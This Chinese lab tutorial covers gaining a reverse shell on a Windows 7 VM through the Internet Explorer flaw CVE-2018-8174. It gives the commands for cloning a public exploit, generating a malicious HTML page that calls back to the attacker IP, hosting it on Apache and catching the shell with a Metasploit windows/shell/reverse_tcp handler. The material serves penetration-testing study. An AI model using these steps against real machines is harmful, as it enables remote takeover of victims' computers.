Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透3 —利用 0DAY 漏洞 CVE-2018-8174 获取 shell

目录

利用 0DAY 漏洞 CVE-2018-8174 获取 shell

(1)、安装 CVE-2018-8174_EXP

(2)、用python2生成恶意 html 文件到网站根目录,并启动 apache2 服务

(3)、新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听


Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!

利用 0DAY 漏洞 CVE-2018-8174 获取 shell

                 ——利用0DAY漏洞(IE浏览器的漏洞)可以向页面注入libs脚本,可以写libs木马脚本注入进去,进行木马攻击,类似于XSS

总结:

        (1)、git clone安装 CVE-2018-8174的EXP到kali

        (2)、用python2、EXP生成恶意 html 文件到网站根目录,并启动 apache2 服务

        (3)、新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听

                        —— 利用exploit/multi/handler模块,设置payloads为windows/shell/reverse_tcp

(1)、安装 CVE-2018-8174_EXP

root@zwzj:~# git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git 或

git clone https://github.com/Yt1g3r/CVE-2018-8174_ExP.git

                        ————从 github 上克隆 CVE-2018-8174 的 EXP 到 Kali

若无法下载或者没有资源、无法访问,可直接在百度网盘接收文件

链接:https://pan.baidu.com/s/1CAD51uknvQbkEUVo1Hm3vA?pwd=wcpv 
提取码:wcpv 

(2)、用python2生成恶意 html 文件到网站根目录,并启动 apache2 服务

root@zwzj:~# cd CVE-2018-8174_EXP-master/

root@zwzj:~/CVE-2018-8174_EXP-master# ls

CVE-2018-8174.py README.md

root@zwzj:~/CVE-2018-8174_EXP-master# python2 CVE-2018-8174.py -u http://192.168.234.141/exploit.html -o hack.rtf -i 192.168.234.141 -p 4444

                                ————注意与要用python2执行,语法有不同

参数说明:

                -u:URL 地址,恶意 html 文件 hack.html 的访问地址

                -o:生成文档

                -i:监听地址

                -p:监听端口

恶意 html 文件生成成功:

root@zwzj:~/CVE-2018-8174_EXP# cp exploit.html /var/www/html/

                                        ————将恶意 html 文件移动到网站根目录

root@zwzj:~/CVE-2018-8174_EXP# service apache2 start                 ——启动 apache2 服务

(3)、新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听

root@zwzj:~# msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.234.141

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > exploit

进入 win7靶机,打开浏览器,访问恶意http://192.168.234.141/exploit.html         

                                                        ——靶机点击恶意链接

返回 kali 查看已经建立会话,攻击获取shell成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值